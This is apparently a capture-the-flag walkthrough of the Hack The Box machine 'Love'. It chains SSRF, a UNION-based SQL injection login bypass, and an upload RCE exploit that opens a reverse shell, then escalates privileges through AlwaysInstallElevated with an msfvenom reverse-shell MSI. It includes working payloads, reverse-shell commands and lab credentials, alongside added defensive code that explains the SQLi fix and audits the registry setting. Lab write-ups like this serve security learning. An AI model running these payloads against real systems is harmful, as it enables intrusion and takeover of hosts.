Recon
rustscan x nmap
```
└─$ rustscan -b 10000 -a 10.10.10.239 -- -T5 -A -sV -Pn
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
443/tcp open ssl/http syn-ack Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
445/tcp open microsoft-ds syn-ack Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql? syn-ack
|_ Host '10.10.16.11' is not allowed to connect to this MariaDB server
| mysql-info:
|_ MySQL Error: Host '10.10.16.11' is not allowed to connect to this MariaDB server
5000/tcp open http syn-ack Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp open unknown syn-ack
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp open pando-pub? syn-ack
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49668/tcp open msrpc syn-ack Microsoft Windows RPC
49669/tcp open msrpc syn-ack Microsoft Windows RPC
49670/tcp open msrpc syn-ack Microsoft Windows RPC
Host script results:
| smb-os-discovery:
| OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: Love
| NetBIOS computer name: LOVE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-09-05T13:06:02-07:00
```
The nmap scan gives us some information about the machine: it is a Windows 10 Pro workstation.
We discover a MySQL server running on port 5000, but we don't have access to it: connections are IP filtered.
```
└─$ mysql --host=10.10.10.239
ERROR 1130 (HY000): Host '10.10.16.11' is not allowed to connect to this MariaDB server
```
We have an HTTP server on port 80 and several other open ports. From the http-title returned by the scan we can see that the website runs a Voting System.
Browsing to http://10.10.10.239/index.php, we face a login form.
Index page with the login form
dirbuster
Using dirbuster, we discover some directories and an interesting admin login page at http://10.10.10.239/admin/index.php.
Vulnerabilities
searchsploit
Running searchsploit, we find multiple vulnerabilities for the Voting System.
```
└─$ searchsploit voting system
----------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------- ---------------------------------
Voting System 1.0 - Authentication Bypass (SQLI) | php/webapps/49843.txt
Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution) | php/webapps/49445.py
Voting System 1.0 - Remote Code Execution (Unauthenticated) | php/webapps/49846.txt
Voting System 1.0 - Time based SQLI (Unauthenticated SQL injection) | php/webapps/49817.txt
----------------------------------------------------------------------------------- ---------------------------------
```
First, we will focus on the Authentication Bypass (SQLI) to try to bypass the login form on the admin page.
Exploiting Voting System
First solution - SSRF
In the nmap scan we discover a certificate on port 443.
We can extract two domains from it:
- love.htb
- staging.love.htb
Subject name of the certificate containing 2 domains
```bash
# add both domains to /etc/hosts (append with >>; a single > would overwrite the existing entries)
echo "10.10.10.239 love.htb staging.love.htb" >> /etc/hosts
```
Browsing to http://staging.love.htb, we face a file scanner service. We find a demo page where we can provide a URL that points to a file.
URL File scanner
Do you remember the IP-filtered MySQL service? Maybe we can get some information from that service.
Exploiting SSRF on the scanner service
We get our creds: admin:@LoveIsInTheAir!!!!
Second solution - SQL injection
This exploit uses a UNION-based SQLi to bypass authentication.
We need to provide a bcrypt hash and a non-existent user:
```
login=&password=admin&username=coucou' UNION SELECT 1,2,"$2y$10$913MFiqWEjfzJ0fZc74hQeRdPGOdggX7KFbd23rfPyf5zmnISBC3a",4,5,6,7 from INFORMATION_SCHEMA.SCHEMATA;-- -
```
With Burp, I craft this payload and try the SQLi:
```
POST /admin/login.php HTTP/1.1
Host: 10.10.10.239
Content-Length: 194
Cache-Control: max-age=
Upgrade-Insecure-Requests: 1
Origin: http://10.10.10.239
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.10.10.239/admin/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=sv9dcm0k1bv1gl1q2nhq5db1e0
Connection: close
username=coucou%27+UNION+SELECT+1%2C2%2C%22%242y%2412%24jRwyQyXnktvFrlryHNEhXOeKQYX7%2F5VK2ZdfB9f%2FGcJLuPahJWZ9K%22%2C4%2C5%2C6%2C7+from+INFORMATION_SCHEMA.SCHEMATA%3B--+-&password=admin&login=
```
It works! We are now connected to the Dashboard as Neovic Devierte (admin).
Voting System Dashboard
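To show why the bypass works and what the fix looks like, here is an added Python model of the login check (not the Voting System's PHP code): SQLite stands in for MariaDB, a SHA-256 helper stands in for bcrypt, and the page's payload is adapted to SQLite syntax. The injected UNION row carries id 1 and an attacker-chosen hash, so the string-built query verifies the supplied password against that hash and binds the session to the real admin's id, while the parameterised query treats the same input as an ordinary username.

```python
import hashlib
import hmac
import sqlite3

# Stand-in for bcrypt's password_hash/password_verify, constructed so the demo runs offline.
def hash_password(pw: str) -> str:
    return hashlib.sha256(pw.encode()).hexdigest()

def verify_password(pw: str, stored: str) -> bool:
    return hmac.compare_digest(hash_password(pw), stored)

def make_db() -> sqlite3.Connection:
    # Seven columns, matching the 1,2,<hash>,4,5,6,7 shape of the UNION payload (constructed data).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (id, username, password, firstname, lastname, photo, created_on)")
    conn.execute("INSERT INTO admin VALUES (1, 'admin', ?, 'Neovic', 'Devierte', '', '')",
                 (hash_password("@LoveIsInTheAir!!!!"),))
    return conn

def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    # String-built query: the username is spliced into the SQL text, so a quote breaks out
    # of the literal and the attacker appends a UNION row with a hash they control.
    sql = f"SELECT * FROM admin WHERE username = '{username}'"
    row = conn.execute(sql).fetchone()
    if row is None or not verify_password(password, row[2]):
        return None
    return row[0]  # the id the application would store in the session

def login_hardened(conn: sqlite3.Connection, username: str, password: str):
    # Parameterised query: the whole username is bound as data and never parsed as SQL.
    row = conn.execute("SELECT * FROM admin WHERE username = ?", (username,)).fetchone()
    if row is None or not verify_password(password, row[2]):
        return None
    return row[0]

# The page's payload adapted to SQLite: a non-existent user, then a UNION row whose
# password column is the hash of a password the attacker knows ("admin").
PAYLOAD = f"coucou' UNION SELECT 1,2,'{hash_password('admin')}',4,5,6,7 -- -"

if __name__ == "__main__":
    print("vulnerable:", login_vulnerable(make_db(), PAYLOAD, "admin"))  # session bound to id 1
    print("hardened:  ", login_hardened(make_db(), PAYLOAD, "admin"))    # None
```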
Get our first shell
Now that we are connected, we can use the File Upload RCE (Authenticated Remote Code Execution) exploit found with searchsploit.
The exploit is a Python script that uploads a PHP script through the profile photo upload feature. Our script will spawn a reverse shell.
We edit the script to fit our needs.
```python
# --- Edit your settings here ----
IP = "10.10.10.239" # Website's URL
USERNAME = "admin" # Auth User
PASSWORD = "@LoveIsInTheAir!!!!" # Auth Password
REV_IP = "10.10.16.11" # Reverse shell IP
REV_PORT = "4444" # Reverse port
# --------------------------------
INDEX_PAGE = f"http://{IP}/admin/index.php"
LOGIN_URL = f"http://{IP}/admin/login.php"
VOTE_URL = f"http://{IP}/admin/voters_add.php"
CALL_SHELL = f"http://{IP}/images/shell.php"
```
After opening a listener with nc, I execute the exploit.
```
└─$ rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.16.11] from (UNKNOWN) [10.10.10.239] 54012
b374k shell : connected
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\omrs\images>whoami
whoami
love\phoebe
C:\xampp\htdocs\omrs\images>type C:\Users\Phoebe\Desktop\user.txt
*************************7feb616
```
We get a shell! We are now connected as love\phoebe, and we can get the user flag.
Path to the privesc
Local recon
Search for any used ports, tasks or privileges.
```
# show used ports
C:\xampp\htdocs\omrs\images> netstat -ano | findstr TCP
# search for tasks
C:\xampp\htdocs\omrs\images> tasklist /v
# show privileges
C:\xampp\htdocs\omrs\images>whoami /all
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
```
But I don't find any interesting information.
WinPeas
I launch a WinPEAS scan and find that the AlwaysInstallElevated setting is enabled. It means that we are able to install and execute an MSI package with elevated privileges.
```
---------- Checking AlwaysInstallElevated
- https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated
AlwaysInstallElevated set to 1 in HKLM!
AlwaysInstallElevated set to 1 in HKCU!
```
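The WinPEAS check reports both hives because the policy only takes effect when the HKLM and the HKCU value are both set to 1. As an added audit helper (not from the page or from WinPEAS), this parses the output of `reg query ... /v AlwaysInstallElevated` for both hives and reports whether the policy is active; the registry paths are the standard policy keys, and the sample output is constructed.

```python
import re

# Constructed sample of `reg query` output for both hives (no real host was queried).
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""

# Same shape, but only the machine policy is set: not enough for the policy to apply.
SAMPLE_HKLM_ONLY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""

KEY_RE = re.compile(r"^(HKEY_LOCAL_MACHINE|HKEY_CURRENT_USER)\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\s*$")
VALUE_RE = re.compile(r"^\s+AlwaysInstallElevated\s+REG_DWORD\s+(0x[0-9a-fA-F]+)\s*$")

def parse_always_install_elevated(text: str) -> dict:
    """Return {'HKLM': int, 'HKCU': int} from reg query output; a missing value counts as 0."""
    values = {"HKLM": 0, "HKCU": 0}
    current = None
    for line in text.splitlines():
        key = KEY_RE.match(line)
        if key:
            current = "HKLM" if key.group(1) == "HKEY_LOCAL_MACHINE" else "HKCU"
            continue
        val = VALUE_RE.match(line)
        if val and current:
            values[current] = int(val.group(1), 16)
    return values

def policy_active(values: dict) -> bool:
    # Both hives must be 1; a single hive at 1 is a misconfiguration but not yet an escalation path.
    return values.get("HKLM") == 1 and values.get("HKCU") == 1

if __name__ == "__main__":
    print("both hives:", policy_active(parse_always_install_elevated(SAMPLE_REG_OUTPUT)))  # True
    print("HKLM only: ", policy_active(parse_always_install_elevated(SAMPLE_HKLM_ONLY)))   # False
```

Remediation is to set the value to 0 (or delete it) under both keys, which corresponds to the "Always install with elevated privileges" policy in Computer and User Configuration.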
Abusing privileges
It is possible to craft our MSI package with msfvenom. Then, we upload the package to the target. Finally, we install and execute the package with the msiexec command.
```
└─$ msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.16.11 lport=4445 -f msi > exploit.msi
# upload the MSI package on C:\Windows\Temp dir
C:\xampp\htdocs\omrs\images>msiexec /quiet /qn /i C:\Windows\Temp\exploit.msi
└─$ nc -lnvp 4445
listening on [any] 4445 ...
connect to [10.10.16.11] from (UNKNOWN) [10.10.10.239] 54112
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>
C:\Users\Administrator\Desktop>type root.txt
type root.txt
**************************43d68b
```
We now own the system! We can get the root flag :)